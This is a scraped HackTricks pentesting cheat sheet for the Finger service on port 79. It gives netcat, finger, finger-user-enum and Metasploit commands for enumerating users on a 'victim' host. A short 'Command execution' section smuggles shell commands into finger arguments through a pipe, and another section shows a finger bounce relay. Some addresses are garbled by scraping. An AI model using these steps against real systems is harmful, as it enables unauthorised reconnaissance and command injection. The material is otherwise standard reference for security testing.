HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
79 - Pentesting Finger
Support HackTricks and get benefits!
โ€‹
A digital transformation tailored to your organization is unique. It also comes with its risks. Defend yourself against hackers. Get protection before it's too late. Talk to the professionals at Securityboat:
Let's connect - Securityboat
Securityboat - Frontline of Your Business

Basic Info

Finger is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files.
Default port: 79
1
PORT STATE SERVICE
2
79/tcp open finger
Copied!

Enumeration

1
nc -vn <IP> 79
2
echo "root" | nc -vn <IP> 79
Copied!

User enumeration

1
finger @<Victim> #List users
2
finger [email protected]<Victim> #Get info of user
3
finger [email protected]<Victim> #Get info of user
Copied!
Alternatively you can use finger-user-enum from pentestmonkey, some examples:
1
finger-user-enum.pl -U users.txt -t 10.0.0.1
2
finger-user-enum.pl -u root -t 10.0.0.1
3
finger-user-enum.pl -U users.txt -T ips.txt
Copied!

Nmap execute a script for doing using default scripts

Metasploit uses more tricks than Nmap

1
use auxiliary/scanner/finger/finger_users
Copied!

Shodan

  • port:79 USER

Command execution

1
finger "|/bin/[email protected]"
2
finger "|/bin/ls -a /@example.com"
Copied!

Finger Bounce

1
finger [email protected]@victim
Copied!
โ€‹
A digital transformation tailored to your organization is unique. It also comes with its risks. Defend yourself against hackers. Get protection before it's too late. Talk to the professionals at Securityboat:
Let's connect - Securityboat
Securityboat - Frontline of Your Business
Support HackTricks and get benefits!